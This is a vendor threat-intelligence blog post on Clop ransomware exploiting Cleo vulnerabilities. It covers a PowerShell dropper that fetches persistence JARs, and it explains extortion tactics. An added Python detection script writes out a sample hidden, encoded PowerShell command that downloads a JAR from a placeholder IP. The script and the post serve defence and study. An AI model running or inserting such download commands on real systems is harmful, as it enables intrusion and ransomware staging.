The Clop ransomware group has once again demonstrated its ability to exploit vulnerabilities to compromise sensitive systems. As Cleo—a managed file transfer provider for businesses—grapples with the aftermath of Clop’s targeted attack on their systems, the spotlight turns to CVE-2024-50623 and CVE-2024-55956, two critical vulnerabilities that enabled these breaches.
In this blog, we’ll provide an overview of these vulnerabilities, highlight what Imperva has observed regarding their exploitation, and explain how our solutions help mitigate these risks.
The Exploited CVEs: A Closer Look
CVE-2024-50623 and CVE-2024-55956 are both critical vulnerabilities within Cleo software, widely used for secure file transfer and data integration. CVE-2024-50623 allows unrestricted file upload and download, which could ultimately lead to remote code execution. Meanwhile, CVE-2024-55956 allows unauthenticated users to import and execute arbitrary Bash or PowerShell commands on the system. These vulnerabilities, if left unaddressed, provide attackers with the means to exfiltrate data and execute malicious payloads, as evidenced by Clop’s exploitation.
Imperva customers are protected against both vulnerabilities.
What Imperva Has Seen
Since the disclosure of these vulnerabilities, we have monitored over 1 million incidents of attempted exploitation, targeting almost 10,000 sites across 60 countries, with a noticeable concentration on the United States and Australia. Industries such as Financial Services and Government have been primary targets, with Clop and other attackers leveraging these CVEs in attempts to gain unauthorized access and disrupt operations. Automated attacks are primarily coming from Go-based tools.
Figure 1: Attacked Industries
After analysis of the payloads, we noticed the attackers attempted to write a file onto the target system. This first-stage dropper file is a crucial component in initiating the attack chain and is designed to invoke a PowerShell script and ultimately conduct code execution.
Figure 2: Observed Payloads
The PowerShell script then reaches out to an external IP address and retrieves JAR files. These JAR files are intended to establish persistence on the server, and are subsequently deleted by the attackers in an attempt to remain undetected.
Figure 3: Decoded PowerShell Script
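As an added illustration that is not part of the original post or of Imperva's tooling, the following Python snippet applies the chain described above to PowerShell command-line telemetry: it decodes an -EncodedCommand payload and flags a JAR retrieved from a bare IP address, the two steps the dropper and script perform. The sample command lines, the script they carry and the 203.0.113.10 address are constructed for the example.

```python
import base64
import re

# PowerShell's encoded-command switches; Figure 3 above is a decoded script,
# meaning the dropper passed its payload base64-encoded.
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# A .jar retrieved from a bare IP address, the fetch pattern described above.
JAR_FROM_IP_RE = re.compile(
    r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/[^\s'\"]*\.jar", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> dict:
    """Check one PowerShell command line against the dropper-to-JAR chain."""
    decoded = decode_encoded_command(cmdline)
    # Scan the raw line and the decoded payload together, so a plain-text and
    # an encoded download are caught the same way.
    text = cmdline + " " + (decoded or "")
    jar_sources = sorted({m.group(1) for m in JAR_FROM_IP_RE.finditer(text)})
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "jar_sources": jar_sources,
        # Encoded command plus a JAR fetched from a raw IP is the combination
        # that matches the observed chain; either alone is only a weak signal.
        "suspicious": decoded is not None and bool(jar_sources),
    }

def _encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample telemetry (not data from the incident); 203.0.113.10 is a
# documentation-range address.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + _encode("(New-Object Net.WebClient).DownloadFile("
              "'http://203.0.113.10:8080/agent.jar','C:\\Temp\\agent.jar')"),
    "powershell.exe -enc " + _encode("Get-Date"),         # encoded but benign
    "powershell.exe -Command Get-Service -Name 'Cleo*'",  # plain and benign
]
```

Run `analyze` over each line of your process-creation logs; only the first sample is reported as suspicious, while the benign encoded command and the plain command are not.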
Persistence is a key aspect of ransomware attacks, ensuring that the attackers maintain control even if the initial attack vector is discovered or removed. In some cases, Clop has been observed leveraging legitimate system tools or modifying system configurations, such as registry keys, to ensure that its payload runs again after a restart or other system event.
As part of its encryption process, Clop ransomware also targets backup systems to ensure that victims are unable to recover their data without paying the ransom. The attackers typically demand payment in cryptocurrency, promising to provide a decryption key upon payment. However, victims often find that paying the ransom doesn’t always guarantee that their data will be restored.
In addition to encrypting files, Clop has been known to exfiltrate sensitive data before encryption, adding an extortion element to the attack. Attackers may threaten to publish or sell the stolen data unless the victim complies with their demands, increasing the pressure on organizations to pay the ransom.
Figure 4: Clop Extortion Site
Clop has previously made news for exploiting vulnerabilities in GoAnywhere MFT and MOVEit, both file transfer programs, in 2023. Clop exploited vulnerabilities CVE-2023-34362 and CVE-2023-0669, which allowed them to access sensitive data from a wide range of companies. The breaches affected over 130 organizations across various industries, from healthcare to finance, further demonstrating Clop's capability to infiltrate high-value targets. As a result, it's estimated that the group potentially earned over $75 million in ransoms, leveraging both data theft and the threat of public exposure to pressure victims into paying.
Conclusion: Staying Ahead of the Threat
The Cleo data theft attacks underscore the urgency of proactive vulnerability management. On top of robust security solutions, it’s important for organizations to prioritize timely patching to mitigate risks from known vulnerabilities like CVE-2024-50623 and CVE-2024-55956.
Imperva remains committed to helping customers secure their critical systems through advanced threat detection and prevention solutions, ensuring resilience against the ever-evolving threat landscape.
Indicators of Compromise (IoCs)